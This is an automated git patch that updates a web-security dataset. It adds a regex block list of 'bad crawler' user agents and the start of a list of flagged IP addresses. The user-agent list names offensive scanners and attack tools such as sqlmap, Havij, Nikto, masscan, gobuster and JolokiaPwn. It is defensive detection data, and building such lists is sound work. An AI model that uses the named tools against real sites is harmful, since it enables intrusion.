From 30bf6292f7b8ef99653648def391141ed1609276 Mon Sep 17 00:00:00 2001
From: ghost <ghost@users.noreply.github.com>
Date: Sun, 6 Oct 2024 00:54:53 +0000
Subject: [PATCH] build: Update DB [Sun Oct  6 00:54:53 UTC 2024]

---
 README.md                    |     8 +-
 db/MD5SUMS                   |     7 +
 db/bad-crawlers.txt          |  1411 +++
 db/bad-ip-addresses.txt      | 18152 +++++++++++++++++++++++++++++++++
 db/bad-referrers.txt         |  7105 +++++++++++++
 db/common-web-attacks.json   |     1 +
 db/cves.json                 |     1 +
 db/db.tar.zst                |   Bin 0 -> 551365 bytes
 db/directory-bruteforces.txt |  5332 ++++++++++
 9 files changed, 32013 insertions(+), 4 deletions(-)
 create mode 100644 db/MD5SUMS
 create mode 100644 db/bad-crawlers.txt
 create mode 100644 db/bad-ip-addresses.txt
 create mode 100644 db/bad-referrers.txt
 create mode 100644 db/common-web-attacks.json
 create mode 100644 db/cves.json
 create mode 100644 db/db.tar.zst
 create mode 100644 db/directory-bruteforces.txt

diff --git a/README.md b/README.md
index 796281de..fc95dec3 100644
--- a/README.md
+++ b/README.md
@@ -9,15 +9,15 @@ This collection serves as the primary repository of external resources/datasets
 |     **Datasets**     | **Count** |
 | -------------------- | --------- |
 | Common Web Attack    | 76      |
-| CVEs                 | 2652      |
-| Bad IP Address       | 17804      |
+| CVEs                 | 2661      |
+| Bad IP Address       | 18152      |
 | Bad Referrer         | 7104      |
 | Bad Crawler          | 1410      |
 | Directory Bruteforce | 5332      |
-|       **Total**      | **34378**      |
+|       **Total**      | **34735**      |
 
 > [!NOTE]
-> Last updated at **Sat Oct  5 00:50:33 UTC 2024**.
+> Last updated at **Sun Oct  6 00:54:53 UTC 2024**.
 
 ## Contributions
 
diff --git a/db/MD5SUMS b/db/MD5SUMS
new file mode 100644
index 00000000..fe57dc86
--- /dev/null
+++ b/db/MD5SUMS
@@ -0,0 +1,7 @@
+d57cfba30adee8c57aecc4dc95883086  bad-crawlers.txt
+83ebb00eee973d403b2f9f83d54523d5  bad-ip-addresses.txt
+8f186aa10b19ce75203890934508f9e1  bad-referrers.txt
+394f8e08f61e118f284f899558f6629f  common-web-attacks.json
+b3ca1fefa588ffaa46780d7e3c194951  cves.json
+69b20787c854945c398b8a8af553ebb8  db.tar.zst
+b7a4b6211aa9022d2c699940e9c57e2f  directory-bruteforces.txt
diff --git a/db/bad-crawlers.txt b/db/bad-crawlers.txt
new file mode 100644
index 00000000..89d586c8
--- /dev/null
+++ b/db/bad-crawlers.txt
@@ -0,0 +1,1411 @@
+ YLT
+^Aether
+^Amazon Simple Notification Service Agent$
+^Amazon-Route53-Health-Check-Service
+^Amazon CloudFront
+^b0t$
+^bluefish 
+^Calypso v\/
+^COMODO DCV
+^Corax
+^DangDang
+^DavClnt
+^DHSH
+^docker\/[0-9]
+^Expanse
+^FDM 
+^git\/
+^Goose\/
+^Grabber
+^Gradle\/
+^HTTPClient\/
+^HTTPing
+^Java\/
+^Jeode\/
+^Jetty\/
+^Mail\/
+^Mget
+^Microsoft URL Control
+^Mikrotik\/
+^Netlab360
+^NG\/[0-9\.]
+^NING\/
+^npm\/
+^Nuclei
+^PHP-AYMAPI\/
+^PHP\/
+^pip\/
+^pnpm\/
+^RMA\/
+^Ruby|Ruby\/[0-9]
+^Swurl 
+^TLS tester 
+^twine\/
+^ureq
+^VSE\/[0-9]
+^WordPress\.com
+^XRL\/[0-9]
+^ZmEu
+008\/
+13TABS
+192\.comAgent
+2GDPR\/
+2ip\.ru
+404enemy
+7Siters
+80legs
+a3logics\.in
+A6-Indexer
+Abonti
+Aboundex
+aboutthedomain
+Accoona-AI-Agent
+acebookexternalhit\/
+acoon
+acrylicapps\.com\/pulp
+Acunetix
+AdAuth\/
+adbeat
+AddThis
+ADmantX
+AdminLabs
+adressendeutschland
+adreview\/
+adscanner
+adstxt-worker
+Adstxtaggregator
+adstxt\.com
+Adyen HttpClient
+AffiliateLabz\/
+affilimate-puppeteer
+agentslug
+AHC
+aihit
+aiohttp\/
+Airmail
+akka-http\/
+akula\/
+alertra
+alexa site audit
+Alibaba\.Security\.Heimdall
+Alligator
+allloadin
+AllSubmitter
+alyze\.info
+amagit
+Anarchie
+AndroidDownloadManager
+Anemone
+AngleSharp
+annotate_google
+Anthill
+Anturis Agent
+Ant\.com
+AnyEvent-HTTP\/
+Apache Ant\/
+Apache Droid
+Apache OpenOffice
+Apache-HttpAsyncClient
+Apache-HttpClient
+ApacheBench
+Apexoo
+apimon\.de
+APIs-Google
+AportWorm\/
+AppBeat\/
+AppEngine-Google
+AppleSyndication
+Aprc\/[0-9]
+Arachmo
+arachnode
+Arachnophilia
+aria2
+Arukereso
+asafaweb
+Asana\/
+Ask Jeeves
+AskQuickly
+ASPSeek
+Asterias
+Astute
+asynchttp
+Attach
+attohttpc
+autocite
+AutomaticWPTester
+Autonomy
+awin\.com
+AWS Security Scanner
+axios\/
+a\.pr-cy\.ru
+B-l-i-t-z-B-O-T
+Backlink-Ceck
+BacklinkHttpStatus
+BackStreet
+BackupLand
+BackWeb
+Bad-Neighborhood
+Badass
+baidu\.com
+Bandit
+basicstate
+BatchFTP
+Battleztar Bazinga
+baypup\/
+BazQux
+BBBike
+BCKLINKS
+BDFetch
+BegunAdvertising
+Bewica-security-scan
+Bidtellect
+BigBozz
+Bigfoot
+biglotron
+BingLocalSearch
+BingPreview
+binlar
+biNu image cacher
+Bitacle
+Bitrix link preview
+biz_Directory
+BKCTwitterUnshortener\/
+Black Hole
+Blackboard Safeassign
+BlackWidow
+BlockNote\.Net
+BlogBridge
+Bloglines
+Bloglovin
+BlogPulseLive
+BlogSearch
+Blogtrottr
+BlowFish
+boitho\.com-dc
+Boost\.Beast
+BPImageWalker
+Braintree-Webhooks
+Branch Metrics API
+Branch-Passthrough
+Brandprotect
+Brandwatch
+Brodie\/
+Browsershots
+BUbiNG
+Buck\/
+Buddy
+BuiltWith
+Bullseye
+BunnySlippers
+Burf Search
+Butterfly\/
+BuzzSumo
+CAAM\/[0-9]
+CakePHP
+Calculon
+Canary%20Mail
+CaretNail
+catexplorador
+CC Metadata Scaper
+Cegbfeieh
+censys
+centuryb.o.t9[at]gmail.com
+Cerberian Drtrs
+CERT\.at-Statistics-Survey
+cf-facebook
+cg-eye
+changedetection
+ChangesMeter
+Charlotte
+chatterino-api-cache
+CheckHost
+checkprivacy
+CherryPicker
+ChinaClaw
+Chirp\/
+chkme\.com
+Chlooe
+Chromaxa
+CirrusExplorer
+CISPA Vulnerability Notification
+CISPA Web Analyser
+Citoid
+CJNetworkQuality
+Clarsentia
+clips\.ua\.ac\.be
+Cloud mapping
+CloudEndure
+CloudFlare-AlwaysOnline
+Cloudflare-Healthchecks
+Cloudinary
+cmcm\.com
+coccoc
+cognitiveseo
+ColdFusion
+colly -
+CommaFeed
+Commons-HttpClient
+commonscan
+contactbigdatafr
+contentkingapp
+Contextual Code Sites Explorer
+convera
+CookieReports
+copyright sheriff
+CopyRightCheck
+Copyscape
+cortex\/
+Cosmos4j\.feedback
+Covario-IDS
+Craw\/
+Crescent
+Criteo
+Crowsnest
+CSHttp
+CSSCheck
+Cula\/
+curb
+Curious George
+curl
+cuwhois\/
+cybo\.com
+DAP\/NetHTTP
+DareBoost
+DatabaseDriverMysqli
+DataCha0s
+DatadogSynthetics
+Datafeedwatch
+Datanyze
+DataparkSearch
+dataprovider
+DataXu
+Daum(oa)?[ \/][0-9]
+dBpoweramp
+ddline
+deeris
+delve\.ai
+Demon
+DeuSu
+developers\.google\.com\/\+\/web\/snippet\/
+Devil
+Digg
+Digincore
+DigitalPebble
+Dirbuster
+Discourse Forum Onebox
+Dispatch\/
+Disqus\/
+DittoSpyder
+dlvr
+DMBrowser
+DNSPod-reporting
+docoloc
+Dolphin http client
+DomainAppender
+DomainLabz
+Domains Project\/
+Donuts Content Explorer
+dotMailer content retrieval
+dotSemantic
+downforeveryoneorjustme
+Download Wonder
+downnotifier
+DowntimeDetector
+Drip
+drupact
+Drupal \(\+http:\/\/drupal\.org\/\)
+DTS Agent
+dubaiindex
+DuplexWeb-Google
+DynatraceSynthetic
+EARTHCOM
+Easy-Thumb
+EasyDL
+Ebingbong
+ec2linkfinder
+eCairn-Grabber
+eCatch
+ECCP
+eContext\/
+Ecxi
+EirGrabber
+ElectricMonk
+elefent
+EMail Exractor
+EMail Wolf
+EmailWolf
+Embarcadero
+Embed PHP Library
+Embedly
+endo\/
+europarchive\.org
+evc-batch
+EventMachine HttpClient
+Everwall Link Expander
+Evidon
+Evrinid
+ExactSearch
+ExaleadCloudview
+Excel\/
+exif
+ExoRank
+Exploratodo
+Express WebPictures
+Extreme Picture Finder
+EyeNetIE
+ezooms
+facebookcatalog
+facebookexternalhit
+facebookexternalua
+facebookplatform
+fairshare
+Faraday v
+fasthttp
+Faveeo
+Favicon downloader
+faviconarchive
+faviconkit
+FavOrg
+Feed Wrangler
+Feedable\/
+Feedbin
+FeedBooster
+FeedBucket
+FeedBunch\/
+FeedBurner
+feeder
+Feedly
+FeedshowOnline
+Feedshow\/
+Feedspot
+FeedViewer\/
+Feedwind\/
+FeedZcollector
+feeltiptop
+Fetch API
+Fetch\/[0-9]
+Fever\/[0-9]
+FHscan
+Fiery%20Feeds
+Filestack
+Fimap
+findlink
+findthatfile
+FlashGet
+FlipboardBrowserProxy
+FlipboardProxy
+FlipboardRSS
+Flock\/
+Florienzh\/
+fluffy
+Flunky
+flynxapp
+forensiq
+ForusP
+FoundSeoTool
+fragFINN\.de
+free thumbnails
+Freeuploader
+FreshRSS
+frontman
+Funnelback
+Fuzz Faster U Fool
+G-i-g-a-b-o-t
+g00g1e\.net
+ganarvisitas
+gdnplus\.com
+GeedoProductSearch
+geek-tools
+Genieo
+GentleSource
+GetCode
+Getintent
+GetLinkInfo
+getprismatic
+GetRight
+getroot
+GetURLInfo\/
+GetWeb
+Geziyor
+Ghost Inspector
+GigablastOpenSource
+GIS-LABS
+github-camo
+GitHub-Hookshot
+github\.com
+Go http package
+Go [\d\.]* package http
+Go!Zilla
+Go-Ahead-Got-It
+Go-http-client
+go-mtasts\/
+gobuster
+gobyus
+Gofeed
+gofetch
+Goldfire Server
+GomezAgent
+gooblog
+Goodzer\/
+Google AppsViewer
+Google Desktop
+Google favicon
+Google Keyword Suggestion
+Google Keyword Tool
+Google Page Speed Insights
+Google PP Default
+Google Search Console
+Google Web Preview
+Google-Ads
+Google-Adwords
+Google-Apps-Script
+Google-Calendar-Importer
+Google-HotelAdsVerifier
+Google-HTTP-Java-Client
+Google-InspectionTool
+Google-Podcast
+Google-Publisher-Plugin
+Google-Read-Aloud
+Google-SearchByImage
+Google-Site-Verification
+Google-SMTP-STS
+Google-speakr
+Google-Structured-Data-Testing-Tool
+Google-Transparency-Report
+google-xrawler
+Google-Youtube-Links
+GoogleDocs
+GoogleHC\/
+GoogleOther
+GoogleProber
+GoogleProducer
+GoogleSites
+Gookey
+GoSpotCheck
+gosquared-thumbnailer
+Gotit
+GoZilla
+grabify
+GrabNet
+Grafula
+Grammarly
+GrapeFX
+GreatNews
+Gregarius
+GRequests
+grokkit
+grouphigh
+grub-client
+gSOAP\/
+GT::WWW
+GTmetrix
+GuzzleHttp
+gvfs\/
+HAA(A)?RTLAND http client
+Haansoft
+hackney\/
+Hadi Agent
+HappyApps-WebCheck
+Hardenize
+Hatena
+Havij
+HaxerMen
+HeadlessChrome
+HEADMasterSEO
+HeartRails_Capture
+help@dataminr\.com
+heritrix
+Hexometer
+historious
+hkedcity
+hledejLevne\.cz
+Hloader
+HMView
+Holmes
+HonesoSearchEngine
+HootSuite Image proxy
+Hootsuite-WebFeed
+hosterstats
+HostTracker
+ht:\/\/check
+htdig
+HTMLparser
+htmlyse
+HTTP Banner Detection
+http-get
+HTTP-Header-Abfrage
+http-kit
+http-request\/
+HTTP-Tiny
+HTTP::Lite
+http:\/\/www.neomo.de\/
+HttpComponents
+httphr
+HTTPie
+HTTPMon
+httpRequest
+httpscheck
+httpssites_power
+httpunit
+HttpUrlConnection
+http\.rb\/
+HTTP_Compression_Test
+http_get
+http_request2
+http_requester
+httrack
+huaweisymantec
+HubSpot 
+HubSpot-Link-Resolver
+Humanlinks
+i2kconnect\/
+Iblog
+ichiro
+Id-search
+IdeelaborPlagiaat
+IDG Twitter Links Resolver
+IDwhois\/
+Iframely
+igdeSpyder
+iGooglePortal
+IlTrovatore
+Image Fetch
+Image Sucker
+ImageEngine\/
+ImageVisu\/
+Imagga
+imagineeasy
+imgsizer
+InAGist
+inbound\.li parser
+InDesign%20CC
+Indy Library
+InetURL
+infegy
+infohelfer
+InfoTekies
+InfoWizards Reciprocal Link
+inpwrd\.com
+instabid
+Instapaper
+Integrity
+integromedb
+Intelliseek
+InterGET
+Internet Ninja
+InternetSeer
+internetVista monitor
+internetwache
+internet_archive
+intraVnews
+IODC
+IOI
+Inboxb0t
+iplabel
+ips-agent
+IPS\/[0-9]
+IPWorks HTTP\/S Component
+iqdb\/
+Iria
+Irokez
+isitup\.org
+iskanie
+isUp\.li
+iThemes Sync\/
+IZaBEE
+iZSearch
+JAHHO
+janforman
+Jaunt\/
+Java.*outbrain
+javelin\.io
+Jbrofuzz
+Jersey\/
+JetCar
+Jigsaw
+Jobboerse
+JobFeed discovery
+Jobg8 URL Monitor
+jobo
+Jobrapido
+Jobsearch1\.5
+JoinVision Generic
+JolokiaPwn
+Joomla
+Jorgee
+JS-Kit
+JungleKeyThumbnail
+JustView
+Kaspersky Lab CFR link resolver
+Kelny\/
+Kerrigan\/
+KeyCDN
+Keyword Density
+Keywords Research
+khttp\/
+KickFire
+KimonoLabs\/
+Kml-Google
+knows\.is
+KOCMOHABT
+kouio
+kube-probe
+kubectl
+kulturarw3
+KumKie
+Larbin
+Lavf\/
+leakix\.net
+LeechFTP
+LeechGet
+letsencrypt
+Lftp
+LibVLC
+LibWeb
+Libwhisker
+libwww
+Licorne
+Liferea\/
+Lighthouse
+Lightspeedsystems
+Likse
+limber\.io
+Link Valet
+LinkAlarm\/
+LinkAnalyser
+link-check
+linkCheck
+linkdex
+LinkExaminer
+linkfluence
+linkpeek
+LinkPreview
+LinkScan
+LinksManager
+LinkTiger
+LinkWalker
+link_thumbnailer
+Lipperhey
+Litemage_walker
+livedoor ScreenShot
+LoadImpactRload
+localsearch-web
+LongURL API
+longurl-r-package
+looid\.com
+looksystems\.net
+lscache_runner
+ltx71
+lua-resty-http
+Lucee \(CFML Engine\)
+Lush Http Client
+lwp-request
+lwp-trivial
+LWP::Simple
+lycos
+LYT\.SR
+L\.webis
+mabontland
+MacOutlook\/
+Mag-Net
+MagpieRSS
+Mail::STS
+MailChimp
+Mail\.Ru
+Majestic12
+makecontact\/
+Mandrill
+MapperCmd
+marketinggrader
+MarkMonitor
+MarkWatch
+Mass Downloader
+masscan\/
+Mata Hari
+mattermost
+Mediametric
+Mediapartners-Google
+mediawords
+MegaIndex\.ru
+MeltwaterNews
+Melvil Rawi
+MemGator
+Metaspinner
+MetaURI
+MFC_Tear_Sample
+Microsearch
+Microsoft Data Access
+Microsoft Office
+Microsoft Outlook
+Microsoft Windows Network Diagnostics
+Microsoft-WebDAV-MiniRedir
+Microsoft\.Data\.Mashup
+MicrosoftPreview
+MIDown tool
+MIIxpc
+Mindjet
+Miniature\.io
+Miniflux
+mio_httpc
+Miro-HttpClient
+Mister PiX
+mixdata dot com
+mixed-content-scan
+mixnode
+Mnogosearch
+mogimogi
+Mojeek
+Mojolicious \(Perl\)
+Mollie
+monitis
+Monitority\/
+Monit\/
+montastic
+MonTools
+Moreover
+Morfeus Fucking Scanner
+Morning Paper
+MovableType
+mowser
+Mrcgiguy
+Mr\.4x3 Powered
+MS Web Services Client Protocol
+MSFrontPage
+mShots
+MuckRack\/
+muhstik-scan
+MVAClient
+MxToolbox\/
+myseosnapshot
+nagios
+Najdi\.si
+Name Intelligence
+NameFo\.com
+Nameprotect
+nationalarchives
+Navroad
+nbertaupete95
+NearSite
+Needle
+Nessus
+Net Vampire
+NetAnts
+NETCRAFT
+NetLyzer
+NetMechanic
+NetNewsWire
+Netpursual
+netresearch
+NetShelter ContentScan
+Netsparker
+NetSystemsResearch
+nettle
+NetTrack
+Netvibes
+NetZIP
+Neustar WPM
+NeutrinoAPI
+NewRelicPinger
+NewsBlur .*Finder
+NewsGator
+newsme
+newspaper\/
+Nexgate Ruby Client
+NG-Search
+nghttp2
+Nibbler
+NICErsPRO
+NihilScio
+Nikto
+nineconnections
+NLNZ_IAHarvester
+Nmap Scripting Engine
+node-fetch
+node-superagent
+node-urllib
+Nodemeter
+NodePing
+node\.io
+nominet\.org\.uk
+nominet\.uk
+Norton-Safeweb
+Notifixious
+notifyninja
+NotionEmbedder
+nuhk
+nutch
+Nuzzel
+nWormFeedFinder
+nyawc\/
+Nymesis
+NYU
+Observatory\/
+Ocelli\/
+Octopus
+oegp
+Offline Explorer
+Offline Navigator
+OgScrper
+okhttp
+omgili
+OMSC
+Online Domain Tools
+Open Source RSS
+OpenCalaisSemanticProxy
+Openfind
+OpenLinkProfiler
+Openstat\/
+OpenVAS
+OPPO A33
+Optimizer
+Orbiter
+OrgProbe\/
+orion-semantics
+Outlook-Express
+Outlook-iOS
+Owler
+Owlin
+ownCloud News
+ow\.ly
+OxfordCloudService
+page scorer
+Page Valet
+page2rss
+PageFreezer
+PageGrabber
+PagePeeker
+PageScorer
+Pagespeed\/
+PageThing
+page_verifier
+Panopta
+panscient
+Papa Foto
+parsijoo
+Pavuk
+PayPal IPN
+pcBrowser
+Pcore-HTTP
+PDF24 URL To PDF
+Pearltrees
+PECL::HTTP
+peerindex
+Peew
+PeoplePal
+Perlu -
+PhantomJS Screenshoter
+PhantomJS\/
+Photon\/
+php-requests
+phpservermon
+Pi-Monster
+Picscout
+Picsearch
+PictureFinder
+Pimonster
+Pingability
+PingAdmin\.Ru
+Pingdom
+Pingoscope
+PingSpot
+ping\.blo\.gs
+pinterest\.com
+Pixray
+Pizilla
+Plagger\/
+Pleroma 
+Ploetz \+ Zeller
+Plukkie
+plumanalytics
+PocketImageCache
+PocketParser
+Pockey
+PodcastAddict\/
+POE-Component-Client-HTTP
+Polymail\/
+Pompos
+Porkbun
+Port Monitor
+postano
+postfix-mta-sts-resolver
+PostmanRuntime
+postplanner\.com
+PostPost
+postrank
+PowerPoint\/
+Prebid
+Prerender
+Priceonomics Analysis Engine
+PrintFriendly
+PritTorrent
+Prlog
+probely\.com
+probethenet
+Project ?25499
+Project-Resonance
+prospectb2b
+Protopage
+ProWebWalker
+proximic
+PRTG Network Monitor
+pshtt, https scanning
+PTST 
+PTST\/[0-9]+
+pulsetic\.com
+Pump
+Python-httplib2
+python-httpx
+python-requests
+Python-urllib
+Qirina Hurdler
+QQDownload
+QrafterPro
+Qseero
+Qualidator
+QueryN Metasearch
+queuedriver
+quic-go-HTTP\/
+QuiteRSS
+Quora Link Preview
+Qwantify
+Radian6
+RadioPublicImageResizer
+Railgun\/
+RankActive
+RankFlex
+RankSonicSiteAuditor
+RapidLoad\/
+Re-re Studio
+ReactorNetty
+Readability
+RealDownload
+RealPlayer%20Downloader
+RebelMouse
+Recorder
+RecurPost\/
+redback\/
+ReederForMac
+Reeder\/
+ReGet
+RepoMonkey
+request\.js
+reqwest\/
+ResponseCodeTest
+RestSharp
+Riddler
+Rival IQ
+Robosourcer
+Robozilla
+ROI Hunter
+RPT-HTTPClient
+RSSMix\/
+RSSOwl
+RuxitSynthetic
+RyowlEngine
+safe-agent-scanner
+SalesIntelligent
+Saleslift
+SAP NetWeaver Application Server
+SauceNAO
+SBIder
+sc-downloader
+scalaj-http
+Scamadviser-Frontend
+ScanAlert
+scan\.lol
+Scoop
+scooter
+ScopeContentAG-HTTP-Client
+ScoutJet
+ScoutURLMonitor
+ScrapeBox Page Scanner
+Scrapy
+Screaming
+ScreenShotService
+Scrubby
+Scrutiny\/
+Search37
+searchenginepromotionhelp
+Searchestate
+SearchExpress
+SearchSight
+SearchWP
+search\.thunderstone
+Seeker
+semanticdiscovery
+semanticjuice
+Semiocast HTTP client
+Semrush
+Sendsay\.Ru
+sentry\/
+SEO Browser
+Seo Servis
+seo-nastroj\.cz
+seo4ajax
+Seobility
+SEOCentro
+SeoCheck
+seocompany
+SEOkicks
+SEOlizer
+Seomoz
+SEOprofiler
+seoscanners
+SEOsearch
+seositecheckup
+SEOstats
+servernfo
+sexsearcher
+Seznam
+Shelob
+Shodan
+Shoppimon
+ShopWiki
+ShortLinkTranslate
+shortURL lengthener
+shrinktheweb
+Sideqik
+Siege
+SimplePie
+SimplyFast
+Siphon
+SISTRIX
+Site Sucker
+Site-Shot\/
+Site24x7
+SiteBar
+Sitebeam
+Sitebulb\/
+SiteCondor
+SiteExplorer
+SiteGuardian
+Siteimprove
+SiteIndexed
+Sitemap(s)? Generator
+SitemapGenerator
+SiteMonitor
+Siteshooter B0t
+SiteSnagger
+SiteSucker
+SiteTruth
+Sitevigil
+sitexy\.com
+SkypeUriPreview
+Slack\/
+sli-systems\.com
+slider\.com
+slurp
+SlySearch
+SmartDownload
+SMRF URL Expander
+SMUrlExpander
+Snake
+Snappy
+SnapSearch
+Snarfer\/
+SniffRSS
+sniptracker
+Snoopy
+SnowHaze Search
+sogou web
+SortSite
+Sottopop
+sovereign\.ai
+SpaceBison
+SpamExperts
+Spammen
+Spanner
+Spawning-AI
+spaziodati
+SPDYCheck
+Specificfeeds
+SpeedKit
+speedy
+SPEng
+Spinn3r
+spray-can
+Sprinklr 
+spyonweb
+sqlmap
+Sqlworm
+Sqworm
+SSL Labs
+ssl-tools
+StackRambler
+Statastico\/
+Statically-
+StatusCake
+Steeler
+Stratagems Kumo
+Stripe\/
+Stroke\.cz
+StudioFACA
+StumbleUpon
+suchen
+Sucuri
+summify
+SuperHTTP
+Surphace Scout
+Suzuran
+swcd 
+Symfony BrowserKit
+Symfony2 BrowserKit
+Synapse\/
+Syndirella\/
+SynHttpClient-Built
+Sysomos
+sysscan
+Szukacz
+T0PHackTeam
+tAkeOut
+Tarantula\/
+Taringa UGC
+TarmotGezgin
+tchelebi\.io
+techiaith\.cymru
+Teleport
+Telesoft
+Telesphoreo
+Telesphorep
+Tenon\.io
+teoma
+terrainformatica
+Test Certificate Info
+testuri
+Tetrahedron
+TextRazor Downloader
+The Drop Reaper
+The Expert HTML Source Viewer
+The Intraformant
+The Knowledge AI
+theinternetrules
+TheNomad
+Thinklab
+Thumbor
+Thumbshots
+ThumbSniper
+timewe\.net
+TinEye
+Tiny Tiny RSS
+TLSProbe\/
+Toata
+topster
+touche\.com
+Traackr\.com
+tracemyfile
+Trackuity
+TrapitAgent
+Trendiction
+Trendsmap
+trendspottr
+truwoGPS
+TryJsoup
+TulipChain
+Turingos
+Turnitin
+tweetedtimes
+Tweetminster
+Tweezler\/
+twibble
+Twice
+Twikle
+Twingly
+Twisted PageGetter
+Typhoeus
+ubermetrics-technologies
+uclassify
+UdmSearch
+ultimate_sitemap_parser
+unchaos
+unirest-java
+UniversalFeedParser
+unshortenit
+Unshorten\.It
+Untiny
+UnwindFetchor
+updated
+updown\.io daemon
+Upflow
+Uptimia
+URL Verifier
+Urlcheckr
+URLitor
+urlresolver
+Urlstat
+URLTester
+UrlTrends Ranking Updater
+URLy Warning
+URLy\.Warning
+URL\/Emacs
+Vacuum
+Vagabondo
+VB Project
+vBSEO
+VCI
+Verity
+via ggpht\.com GoogleImageProxy
+Virusdie
+visionutils
+Visual Rights Group
+vkShare
+VoidEYE
+Voil
+voltron
+voyager\/
+VSAgent\/
+VSB-TUO\/
+Vulnbusters Meter
+VYU2
+w3af\.org
+W3C-checklink
+W3C-mobileOK
+W3C_Unicorn
+WAC-OFU
+WakeletLinkExpander
+WallpapersHD
+Wallpapers\/[0-9]+
+wangling
+Wappalyzer
+WatchMouse
+WbSrch\/
+WDT\.io
+Web Auto
+Web Collage
+Web Enhancer
+Web Fetch
+Web Fuck
+Web Pix
+Web Sauger
+Web spyder
+Web Sucker
+web-capture\.net
+Web-sniffer
+Webalta
+Webauskunft
+WebAuto
+WebCapture
+WebClient\/
+webcollage
+WebCookies
+WebCopier
+WebCorp
+WebDataStats
+WebDoc
+WebEnhancer
+WebFetch
+WebFuck
+WebGazer
+WebGo IS
+WebImageCollector
+WebImages
+WebIndex
+webkit2png
+WebLeacher
+webmastercoffee
+webmon 
+WebPix
+WebReaper
+WebSauger
+webscreenie
+Webshag
+Webshot
+Website Quester
+websitepulse agent
+WebsiteQuester
+Websnapr
+WebSniffer
+Webster
+WebStripper
+WebSucker
+webtech\/
+WebThumbnail
+Webthumb\/
+WebWhacker
+WebZIP
+WeLikeLinks
+WEPA
+WeSEE
+wf84
+Wfuzz\/
+wget
+WhatCMS
+WhatsApp
+WhatsMyIP
+WhatWeb
+WhereGoes\?
+Whibse
+WhoAPI\/
+WhoRunsCoinHive
+Whynder Magnet
+Windows-RSS-Platform
+WinHttp-Autoproxy-Service
+WinHTTP\/
+WinPodder
+wkhtmlto
+wmtips
+Woko
+Wolfram HTTPClient
+woorankreview
+WordPress\/
+WordupinfoSearch
+Word\/
+worldping-api
+wotbox
+WP Engine Install Performance API
+WP Rocket
+wpif
+wprecon\.com survey
+WPScan
+wscheck
+Wtrace
+WWW-Collector-E
+WWW-Mechanize
+WWW::Document
+WWW::Mechanize
+WWWOFFLE
+www\.monitor\.us
+x09Mozilla
+x22Mozilla
+XaxisSemanticsClassifier
+XenForo\/
+Xenu Link Sleuth
+XING-contenttabreceiver
+xpymep([0-9]?)\.exe
+Y!J-[A-Z][A-Z][A-Z]
+Yaanb
+yacy
+Yahoo Link Preview
+YahooCacheSystem
+YahooMailProxy
+YahooYSMcm
+YandeG
+Yandex(?!Search)
+yanga
+yeti
+Yo-yo
+Yoleo Consumer
+yomins\.com
+yoogliFetchAgent
+YottaaMonitor
+Your-Website-Sucks
+yourls\.org
+YoYs\.net
+YP\.PL
+Zabbix
+Zade
+Zao
+Zapier
+Zauba
+Zemanta Aggregator
+Zend\\Http\\Client
+Zend_Http_Client
+Zermelo
+Zeus 
+zgrab
+ZnajdzFoto
+ZnHTTP
+Zombie\.js
+Zoom\.Mac
+ZoteroTranslationServer
+ZyBorg
+[a-z0-9\-_]*(bot|crawl|archiver|transcoder|spider|uptime|validator|fetcher|cron|checker|reader|extractor|monitoring|analyzer|scraper)
\ No newline at end of file
diff --git a/db/bad-ip-addresses.txt b/db/bad-ip-addresses.txt
new file mode 100644
index 00000000..13905d01
--- /dev/null
+++ b/db/bad-ip-addresses.txt
@@ -0,0 +1,18152 @@
+1.1.178.34
+1.11.62.197
+1.12.60.59
+1.14.108.22
+1.14.139.92
+1.14.177.4
+1.14.205.166
+1.15.249.6
+1.158.7.183
+1.178.45.115
+1.179.128.124
+1.179.220.209
+1.179.228.195
+1.180.169.234
+1.180.219.210
+1.180.219.211
+1.180.219.212
+1.180.230.98
+1.180.97.138
+1.180.98.210
+1.183.13.194
+1.192.48.215
+1.193.163.2
+1.194.160.101
+1.194.160.98
+1.194.166.30
+1.197.78.123
+1.201.162.20
+1.202.113.85
+1.202.116.237
+1.202.117.60
+1.202.223.2
+1.209.148.183
+1.212.225.99
+1.213.164.27
+1.213.180.227
+1.214.197.163
+1.214.42.172
+1.215.240.130
+1.220.64.218
+1.227.228.136
+1.232.29.63
+1.232.42.108
+1.234.28.71
+1.234.31.117
+1.234.58.162
+1.234.70.108
+1.235.192.130
+1.237.137.30
+1.237.162.20
+1.237.162.63
+1.238.106.229
+1.245.207.104
+1.252.63.242
+1.253.28.16
+1.254.101.182
+1.27.171.154
+1.28.87.246
+1.28.87.38
+1.30.20.238
+1.30.20.98
+1.31.80.222
+1.34.85.243
+1.36.184.77
+1.36.65.78
+1.55.158.192
+1.55.33.86
+1.69.115.157
+1.69.21.108
+1.69.67.158
+1.7.229.162
+1.70.12.194
+1.70.126.104
+1.70.126.138
+1.70.126.79
+1.70.131.106
+1.70.132.69
+1.70.137.122
+1.70.14.28
+1.70.140.162
+1.70.140.165
+1.70.140.39
+1.70.142.225
+1.70.142.255
+1.70.15.254
+1.70.160.30
+1.70.161.102
+1.70.171.229
+1.70.172.159
+1.70.175.103
+1.70.175.247
+1.70.176.26
+1.70.179.211
+1.70.184.84
+1.70.186.131
+1.70.190.118
+1.70.190.235
+1.70.191.48
+1.70.22.74
+1.70.8.12
+1.70.8.142
+1.70.8.204
+1.70.80.99
+1.70.84.118
+1.70.85.136
+1.70.86.109
+1.70.9.12
+1.71.2.174
+1.82.135.154
+1.82.217.54
+1.85.244.177
+1.94.13.87
+1.94.138.159
+1.94.4.212
+100.29.192.1
+100.29.192.10
+100.29.192.100
+100.29.192.101
+100.29.192.102
+100.29.192.103
+100.29.192.104
+100.29.192.106
+100.29.192.107
+100.29.192.108
+100.29.192.109
+100.29.192.11
+100.29.192.111
+100.29.192.112
+100.29.192.114
+100.29.192.115
+100.29.192.116
+100.29.192.117
+100.29.192.119
+100.29.192.12
+100.29.192.120
+100.29.192.121
+100.29.192.122
+100.29.192.123
+100.29.192.125
+100.29.192.13
+100.29.192.14
+100.29.192.18
+100.29.192.19
+100.29.192.2
+100.29.192.20
+100.29.192.21
+100.29.192.22
+100.29.192.23
+100.29.192.24
+100.29.192.25
+100.29.192.26
+100.29.192.27
+100.29.192.29
+100.29.192.3
+100.29.192.31
+100.29.192.32
+100.29.192.33
+100.29.192.34
+100.29.192.35
+100.29.192.36
+100.29.192.37
+100.29.192.38
+100.29.192.39
+100.29.192.4
+100.29.192.41
+100.29.192.42
+100.29.192.44
+100.29.192.46
+100.29.192.48
+100.29.192.49
+100.29.192.50
+100.29.192.51
+100.29.192.54
+100.29.192.55
+100.29.192.56
+100.29.192.57
+100.29.192.58
